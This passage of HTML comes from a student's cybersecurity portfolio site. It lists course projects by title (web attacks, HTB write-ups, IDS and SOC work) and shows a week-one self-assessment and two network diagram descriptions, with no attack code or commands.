          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
